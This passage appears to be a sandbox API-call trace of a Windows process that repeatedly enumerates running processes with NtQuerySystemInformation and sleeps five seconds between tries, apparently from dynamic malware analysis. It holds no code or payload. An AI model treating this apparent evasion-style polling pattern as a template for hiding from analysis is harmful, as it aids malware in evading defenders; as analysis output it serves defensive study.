Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.216] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.217] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.221] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.222] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.222] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.223] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.223] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.225] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.226] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.237] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.238] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.238] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.241] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.242] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.253] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.253] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.253] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.254] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.257] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.258] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.269] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.269] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.270] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.270] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.273] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.274] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.287] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.288] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.288] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.288] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.290] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.291] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.300] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.301] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.301] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.303] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.304] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.315] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.315] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.316] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.316] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.319] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.319] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.339] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.339] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.351] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.351] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.351] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.354] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.354] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.368] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.368] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.369] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.369] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.369] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.371] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.372] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.377] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.378] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.378] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.379] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.379] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.382] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.382] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.393] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.393] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.394] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.394] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.394] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.397] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.397] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.409] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.410] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.410] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.410] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.412] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.413] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.427] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.428] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.428] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.431] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.432] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.440] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.440] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.441] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.441] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.441] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.444] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.444] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.457] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.457] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.458] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.458] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.458] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.460] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.461] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.471] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.472] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.472] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.472] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.474] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.475] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.487] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.487] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.488] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.488] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.488] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.491] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.491] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.503] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.504] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.504] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.505] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.508] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.509] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.518] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.518] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.518] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.519] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.519] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.521] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.521] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.534] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.534] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.535] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.535] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.535] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.538] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.539] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.559] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.559] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.560] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.560] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.560] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.562] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.563] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.581] 